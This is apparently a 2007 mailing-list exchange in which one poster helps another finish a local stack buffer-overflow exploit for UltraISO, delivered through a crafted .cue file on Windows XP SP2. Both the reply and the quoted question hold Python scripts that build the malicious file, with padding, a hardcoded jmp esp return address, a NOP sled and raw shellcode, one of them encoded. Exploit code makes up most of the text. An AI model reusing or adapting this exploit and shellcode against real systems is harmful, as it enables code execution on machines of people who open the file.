Re: Help developing exploit

["Thomas Pollet" <thomas.pollet () gmail com>]

Hi,

try to return to a "jmp esp", also pick one that doesn't result in an
invalid file format.

e.g.

import struct
scode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x38\x4e\x41\x4b\x38"
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x48\x42\x44\x42\x43\x45\x38\x42\x4c\x4a\x37"
"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x43\x4f\x55\x41\x43"
"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
"\x42\x55\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x46\x43\x56\x50\x42\x45\x56\x4a\x37\x45\x36\x42\x30\x5a"
)
cue='FILE "'
cue+='B'*1099
#77f84143:       ff e4                   jmp    *%esp
#had to try a few to get a good one
cue+=struct.pack('<L',0x77f84143)
cue+=scode

cue+='.bin" BINARY\n'
cue+=' TRACK 01 MODE1/2352\n   INDEX 01 00:00:00'

cue_file = open("xpl.cue","w")
cue_file.write(cue)
bin_file = open("xpl.bin","w")

Regards,
Thomas Pollet

On 26 May 2007 17:32:12 -0000, KaCo678 () aol com <KaCo678 () aol com> wrote:
> Hi i was wondering if you would able to help.//I recently found a stack over flow in Ultra iso and was trying to write a local exploit for it..But im able to find the address where my nop sled is and every thing ive tried hasnt worked..And well as you seam to be a well respected member of the community you might be able to help me...Ive asked a few people for help with this one,,But still no further forward..Ill explain the best i can..Im able to control the ecx register and eip ..I attach aolly dbg and open the cue file..And the program crashes my eip points to 90909090 nop sled lol then i press shift + f9 and then i can write any thing i want to the eip so for testing i wrote 41424344 which then wrote to the eip and ecx register..At 3299 bytes then the 4 bytes to write to the registers..Ive provided a little test script..Its a mess but its just for testing m8..also worth noting that we still have to actually fill the rest of the file ..So altogether we have 5004 bytes to 
th
>  e file..I hope im making sence i was guna use bouncing shared library's method..But not sure i changed the eip to the 
> address of 0x7C80C75B jmp ebp as my nops where in there some where...Ive wrote a python script im using to test it ...Also 
> if you do take a look you will need to create a fake bin file in the same directory..Any help would be great thnx for your 
> time.
>
>
> #!/usr/bin/python
>
> ###
>
>
> import sys
>
> import struct
>
> import time
>
>
> head_file =     "\x46\x49\x4c\x45\x20\x22" #Header of file
>
>
> buffer1 =       "\x90" * 4000 #4000  nops
>
>
> nop =           "\x90" * 189 #189 nops
>
>
> shell =     "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb" # 110 bytes shell code
>
> shell +=    "\x77\x1d\x80\x7c"
>
> shell +=    "\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb"
>
> shell +=    "\x28\xac\x80\x7c"
>
> shell +=    "\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51"
>
> shell +=    "\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff"
>
> shell +=    "\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"
>
> shell +=    "\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"
>
> shell +=    "\xff\x4f\x6d\x65\x67\x61\x37\x4e"
>
>
> fuck =          "\x90" * 2 #lost 2 bytes some where made it up lol
>
>
>
> offset =        "\x41\x42\x43\x44"
>
>
> buffer2 =       "\x45" * 701  #fill the rest of the file with junk
>
>
>
> Head_end =     "\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20" #end of file.
>
> Head_end +=    "\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32"
>
> Head_end +=    "\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31"
>
> Head_end +=    "\x20\x30\x30\x3a\x30\x30\x3a\x30\x30"
>
>
> cue_file = open("1.cue","wb")
>
>
> cue_file.write(head_file + buffer1 + nop + shell + fuck + offset + buffer2 + Head_end)
>
>
> cue_file.close()
>
>
> Im very confused at the moment as a few people have told me a few ways to exploit this lol..But im still learning..I 
> was wondering could i just not point my eip to my nop sled..So my shell code gets executed..Im working with windows xp 
> sp2/..Just cant seam to get to the adress of my nop code/